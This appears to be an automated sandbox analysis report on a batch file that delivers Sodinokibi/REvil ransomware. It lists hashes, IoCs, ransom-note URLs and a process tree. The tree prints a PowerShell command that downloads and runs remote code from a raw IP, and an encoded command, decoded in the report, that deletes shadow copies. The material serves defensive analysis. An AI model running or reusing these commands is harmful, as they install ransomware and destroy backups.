Analysis
- max time kernel: 39s
- max time network: 35s
- platform: windows7_x64
- resource: win7v200430
- submitted: 15-05-2020 19:19
Static task: static1
Behavioral task: behavioral1
- Sample: c509aa5a7dfc8054aa7b969c9b18e245.bat
- Resource: win7v200430
Behavioral task: behavioral2
- Sample: c509aa5a7dfc8054aa7b969c9b18e245.bat
- Resource: win10v200430
General
- Target: c509aa5a7dfc8054aa7b969c9b18e245.bat
- Size: 221B
- MD5: 2f633c8f1954a6a34a856ca408955cc0
- SHA1: fcad0d04ed8366491a60c78bb0210502e2755f91
- SHA256: a1eabb8f6bb968611704695eecb919d4b989b4882ddc982fea9d14b1a2d43486
- SHA512: 1f5b2b75571fbbd329bf0c89c8d1789424aaddd8b942fdf7579a36fde344b881093022de34570cb3938b038e394ff2c42854cd6f20d493a896105f22b30f009c
Malware Config
Extracted (download URL from the batch script):
- http://185.103.242.78/pastes/c509aa5a7dfc8054aa7b969c9b18e245
Extracted from C:\p7wl3-readme.txt (ransom note), family: sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E87379AD627A29CF
- http://decryptor.cc/E87379AD627A29CF
Signatures

Drops file in Program Files directory (19 IoCs)
Processes: powershell.exe
description | ioc | process
File opened for modification | \??\c:\program files\RedoClose.midi | powershell.exe
File opened for modification | \??\c:\program files\SuspendCompress.shtml | powershell.exe
File opened for modification | \??\c:\program files\UndoOpen.png | powershell.exe
File opened for modification | \??\c:\program files\UseUndo.tiff | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\p7wl3-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ConnectResolve.cr2 | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\p7wl3-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\RemoveRename.htm | powershell.exe
File opened for modification | \??\c:\program files\StartLock.M2TS | powershell.exe
File opened for modification | \??\c:\program files\ResolveRestart.js | powershell.exe
File opened for modification | \??\c:\program files\RevokeSuspend.tmp | powershell.exe
File opened for modification | \??\c:\program files\UnblockInvoke.mht | powershell.exe
File opened for modification | \??\c:\program files\ConvertRename.wma | powershell.exe
File opened for modification | \??\c:\program files\DismountConvertFrom.xht | powershell.exe
File opened for modification | \??\c:\program files\BlockBackup.vstm | powershell.exe
File opened for modification | \??\c:\program files\ProtectExit.cfg | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\p7wl3-readme.txt | powershell.exe
File created | \??\c:\program files\p7wl3-readme.txt | powershell.exe
File created | \??\c:\program files (x86)\p7wl3-readme.txt | powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
pid | process
304 | powershell.exe
Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes: powershell.exe, powershell.exe
pid | process | entries
304 | powershell.exe | 75 entries
1036 | powershell.exe | 2 entries
Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
flow | pid | process
1 | 304 | powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\125rr.bmp" | powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
description | pid | process | target process
PID 1440 wrote to memory of 304 | 1440 | cmd.exe | powershell.exe
PID 304 wrote to memory of 1036 | 304 | powershell.exe | powershell.exe
PID 304 wrote to memory of 1036 | 304 | powershell.exe | powershell.exe
PID 304 wrote to memory of 1036 | 304 | powershell.exe | powershell.exe
PID 304 wrote to memory of 1036 | 304 | powershell.exe | powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 304 | powershell.exe
Token: SeDebugPrivilege | 304 | powershell.exe
Token: SeDebugPrivilege | 1036 | powershell.exe
Token: SeBackupPrivilege | 1844 | vssvc.exe
Token: SeRestorePrivilege | 1844 | vssvc.exe
Token: SeAuditPrivilege | 1844 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 304 | powershell.exe
Processes

- C:\Windows\system32\cmd.exe (PID 1440, depth 1)
  command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\c509aa5a7dfc8054aa7b969c9b18e245.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 304, depth 2, child of 1440)
    command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c509aa5a7dfc8054aa7b969c9b18e245');Invoke-ACEEGDUJNDIFWO;Start-Sleep -s 10000"
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1036, depth 3, child of 304)
      command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64 of a UTF-16LE string and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which is the shadow-copy deletion that triggers the vssvc.exe activity below)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 1844, depth 1)
  command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken